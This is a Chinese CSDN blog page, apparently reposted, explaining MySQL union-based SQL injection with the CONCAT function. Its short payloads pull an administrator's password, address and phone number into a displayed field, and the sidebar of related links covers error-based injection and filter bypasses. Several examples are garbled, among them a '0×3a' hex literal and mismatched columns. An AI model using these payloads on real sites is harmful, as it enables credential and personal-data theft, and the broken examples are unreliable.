mysql使用concat防注入_Mysql必读Mysql数据库使用concat函数执行SQL注入查询

最新推荐文章于 2024-03-04 00:13:12 发布
最新推荐文章于 2024-03-04 00:13:12 发布
阅读量462 收藏
点赞数
文章标签: mysql使用concat防注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39968640/article/details/113981717
版权

MysqL必读MysqL数据库使用concat函数执行sql注入查询,希望对您有用。如果有疑问,可以联系我们。

sql注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来.

代码如下:

select username,email,content from test_table where user_id=uid;

其中uid,是用户输入的.正常显示结果会出现用户名,用户邮箱,用户留言内容.但是如果uid过滤不严,我们可以构造如下sql语句来获得任意数据表信息.

代码如下:

uid=-1 union select username,password,content from test_talbe where user_id=管理员id;

实际执行就是

代码如下:

select username,content from test_table where user_id=-1 union select username,content from test_talbe where user_id=管理员id;

其中显示正常用户emai的地方,变成了显示管理员的密码了.

但是,往往事情并不是这么简单,首先要找到漏洞,其次构造这种语句时候要考虑各个字段的类型,让int或samllint类型的字段显示varchar显然不合适.最后就是本文要说的.

如果出现问题的sql语句只有一个或两个字段怎么办,我们想知道很多东西,一两个字段太少了,远远不能满足我们的需要.那么我们可以使用concat函数.

concat函数本来是这样用的SELECT CONCAT('My','S','QL');执行结果是'MysqL'.也就是连接作用的.我们利用它来为我们服务,

代码如下:

uid=-1 union select username,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;

这个语句实际查询了六个字段,但是显示的时候,把password,telephone等字段合在一起,显示在原本应该显示email的地方.

更好的方法:中间用分隔符分开:

代码如下:

uid=-1 union select username,0×3a,content from test_talbe where user_id=管理员id;

其中0×3a是“:”的十六进 制形式.

总结

如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。

如您喜欢交流学习经验,点击链接加入交流1群:1065694478(已满)交流2群:163560250

weixin_39968640
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
concat mysql sql注入_Web安全测试学习笔记-SQL注入-利用concat和updatexml函数
weixin_42097668的博客
12-29 360
mysql数据库中有两个函数concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数使用方法,结合实例来理解这种sql注入方式的原理。concat函数mysql的字符串连接函数,定义如下: 先来验证下concat函数的功能:select concat('m','y','s','q','l')验证结果:如定义所示,concat将字符串连接起...
MySQL统计函数GROUP_CONCAT使用陷阱分析
09-10
MySQL中的`GROUP_CONCAT`函数是一个非常实用的统计工具,它允许你在聚合查询中将多个行的某个列值合并成一个字符串,用指定的分隔符连接。然而,使用`GROUP_CONCAT`时存在一些潜在的陷阱,这些陷阱可能导致数据...
模糊查询-sql注入
xiaoguaihu12的博客
09-06 1925
在mapper中写 模糊查询,按名称查询时,直接在sql语句中写%x%,等于写死在里面了,以后 每次查询都需要改动,那怎么办呢? 1.加入concat()关键字:concat('%',#{name},'%') 不常用,比较麻烦。动态参数 底层调用parperedStatement 可sql注入 2.'%' #{name} '%' 常用 中间有空格注意。动态参数 底层调用parpere...
concat mysql sql注入_MySQL 及 SQL 注入范方法
weixin_39586265的博客
12-20 369
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。1.以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间:if (preg_match("/^\w{8,20}$/",...
SQL 取空格右边的字符_SQL注入绕过与御(Web漏洞及御)
weixin_39715907的博客
11-16 238
SQL注入绕过大小写绕过根据应用程序的过滤规则,通常对恶意关键字设置黑名单,如果存在恶意关键字,应用程序就退出运行。但在过滤规则中可能存在过滤不完整或只过滤小写或大小的情况,没有针对大小写组合进行过滤,导致可以通过大小写混写来绕过关键字过滤!aNd 1=1 ......orDer ByseLeCt......双写关键字绕过id =1 and 1=1加入and被过滤了,最后变成了id =1 1=...
Mybatis中的concat()函数是如何sql注入的 理解整理
我叫鱿鱼须的博客
10-27 3930
前言: 刚开始接触Mybatis时,对于xml文件中的concat()函数使用不是太理解,现在终于搞明白的,其实不难理 CustomerMapper.xml文件下的 配置: <!-- bind的测试 --> <select id="findCustomerByName1" parameterType="customer" resultType="customer"> <bind name="parttern_username" value="username"/
mysqlsql注入
得粟
04-05 1770
实现sql注入常见类型: 利用逻辑运算符;利用mysql注释特性,mysql支持 /* 和 # 两种注释格式  %23=='#';(相当于程序后面的SQL语句给注释了) sql注入的几种方法: 使用php处理过滤已知威胁使用接口时之允许已知用户请求使用PDO、mysqli等数据库抽象层
Mysql数据库使用concat函数执行SQL注入查询
09-10
MySQL数据库中的`CONCAT`函数SQL注入场景中扮演着重要的角色,因为它允许攻击者将多个字段合并成一个字符串,从而获取原本无法直接查询到的信息。SQL注入是一种常见的安全漏洞,发生在应用程序未能充分验证用户...
mysql的group_concat函数使用示例
12-15
MySQL中的`GROUP_CONCAT`函数是一个非常实用的聚合函数,用于在分组查询时将同一组内多个相同字段的值合并成一个字符串,各值之间用指定的分隔符隔开。这个函数对于数据报告、汇总和数据分析非常有用。下面我们将...
mysql函数拼接查询concat函数使用方法
01-21
//查询表managefee_managefee的年year 和 month ,用concat函数拼成year-month。例如将2017和1 拼成2017-01。. select CONCAT(a.year,'-',if(a.month<=9,CONCAT('0',a.month),a.month))as date,a.* from managefee...
SQL注入和特殊字符输入
ldp472258781的专栏
03-29 1272
<br />所有查询语句涉及到模糊查询的。需要修改以sql注入,例子:<br />R.NAME LIKE CONCAT('%',#searchName#,'%') or R.ROLE_DESC LIKE CONCAT('%',#searchName#,'%')
concat mysql sql注入_「sql注入MySQL暴错注入方法整理
weixin_32237761的博客
12-29 218
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法1、通过floor暴错/*数据库版本*/http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (...
mysql 注入的方法_Mysql常用的注入方法 | 极安全-JiSec
weixin_35947010的博客
01-18 641
1.简单sql注入简述:所谓SQL注入攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入攻击。magic_quotes_gpc的一点认识以及addslashesaddcslashes区别:1、条件:magi...
张小白的渗透之路(六)——SQL注入的思路、流程及SQL的CONCAT系列函数、Information_schema数据库讲解
Litbai_zhang
10-31 2019
前言 关于SQL注入理论的内容,小白之前的博客有写,有兴趣的可以去看一看哦~SQL注入原理详解 实践 ps: 实验的环境小白用的sqli-labs的第一关,下面让我们开始吧 第一关呢提示我们可以用数字型的注入就可以过啦 我们在url输入 ?id=1 结果显示通关啦 当然,小白的目的不是写通关攻略,所以接下来让我们继续以这个例子来更深入的理解一下SQL注入的思路。 那么比方说我现在想获取的是数...
concat函数_SQL报错注入常用函数
weixin_39656174的博客
11-24 409
注:本文仅供学习参考SQL报错注入定义SQL报错注入基于报错的信息获取,虽然数据库报错了,当我们已经获取到我们想要的数据。例如在增加删除修改处尝试(insert/update/delete)。报错注入条件:后台没有屏蔽数据库报错信息,在语法发生错误的时候输出在前端。常用四个报错函数updatexml():是mysql对xml文档数据进行查询和修改的xpath函数extractvalue...
SQL注入漏洞,常用注入函数及其pakachu漏洞靶场演示
最新发布
ytdd66的博客
03-04 1263
SQL:是操作数据库数据的结构化的查询语言,实现对网页应用数据和后台数据库的交互。SQL注入是将表单域或数据包输入的参数,拼接成的SQL语句,传递给Web服务器,进而传给数据库服务器并得到执行,达到获取数据库信息的目的。如果Web应用程序的开发人员对用户输入的数据或Cookie等内容未过滤或者验证就直接传给数据库,就可能导致恶意的SQL语句被执行,进而获取数据库的信息,造成SQL注入攻击
实况转播SQL注入全过程,让你知道危害有多大。
qq100440110的专栏
03-16 701
原文:http://www.cnblogs.com/hkncd/archive/2012/03/31/2426274.html 前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多
Mysql优化安全】sql注入
weixin_44823875的博客
05-20 6088
Mysql安全】sql注入(1)什么是sql注入(2)寻找sql注入的方法(3)mybatis是如何做到sql注入的(3.1)sql对比(3.2)简单分析(3.3)底层实现原理(3.4)总结#{}和${}的区别(3.5)总结(3.6)如果手工处理“${xxx}”(3)常见的sql注入问题:数据库查询参数的类型转换处理(4)sql注入的思路(5)放置sql注入的方法 (1)什么是sql注入 (1)概念 “SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让
Mysql concat函数SQL注入
孔子说
12-16 5562
     SQL注入语句有时候使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。      例如:原本查询语句是 select username,email,content from test_table where user_id=uid;其中uid,是用户输入的。正常显示结果出现用户名,用户邮箱,用户留言
mysql查询使用 group_concat()
03-01
MySQL中的子查询是指在一个查询语句中嵌套另一个查询语句。而GROUP_CONCAT()函数MySQL中用于将多行数据合并为一行的聚合函数。 在使用查询和GROUP_CONCAT()函数时,可以将子查询的结果作为GROUP_CONCAT()函数的输入,从而实现将多行数据合并为一行,并以逗号分隔的形式展示。 下面是一个示例,演示了如何使用查询和GROUP_CONCAT()函数: 假设我们有两个表:orders和customers。orders表包含订单信息,customers表包含客户信息。我们想要查询每个客户的订单信息,并将订单号以逗号分隔的形式展示。 ```sql SELECT customers.customer_id, customers.customer_name, (SELECT GROUP_CONCAT(order_number) FROM orders WHERE orders.customer_id = customers.customer_id) AS order_numbers FROM customers; ``` 在上述示例中,子查询`(SELECT GROUP_CONCAT(order_number) FROM orders WHERE orders.customer_id = customers.customer_id)`用于获取每个客户的订单号,并使用GROUP_CONCAT()函数将订单号合并为一行。最终的查询结果将包含客户ID、客户名称和订单号。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值